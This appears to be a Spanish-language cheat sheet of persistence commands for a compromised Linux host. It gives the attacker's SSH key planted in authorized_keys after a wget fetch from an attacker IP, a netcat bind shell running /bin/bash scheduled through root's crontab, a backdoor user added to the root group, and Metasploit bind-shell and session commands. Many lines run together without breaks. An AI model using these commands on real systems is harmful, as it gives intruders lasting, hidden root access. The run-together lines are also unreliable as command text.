ssh-keygen -t rsa -b 4096
# En caso de que se solicite una contraseña tenemos la opción de dejarlo en blancossh-copy-id <victim-user>@<target-ip-or-hostname>
# Se solicitará la contraseña del usuariossh <victim-user>@<target-ip-or-hostname>ssh-keygen -t rsa -b 4096
# En caso de que se solicite una contraseña tenemos la opción de dejarlo en blancocd ~/.ssh/
python3 -m http.server 80
# Alternativa con Python2.7
python2 -m SimpleHTTPServer 80wget http://<attacker-ip>/id_rsa.pub
cat id_rsa.pub >> .ssh/authorized_keysecho 'nc -lkvnp 4443 -e /bin/bash >/dev/null &' > /tmp/bindshellecho ' /tmp/bindshell' | sudo tee -a /var/spool/cron/crontabs/rootadduser -m user -s /bin/bash ftppasswd ftpusermod -aG root ftpuse payload/generic/shell_bind_tcp
set RHOST <target-ip>
set LPORT <local-port>
exploit# CTRL + Z o escribe 'background' para poner la sesión previamente obtenida en segundo plano
sessions -l
sessions -u <session-id>
sessions <session-id>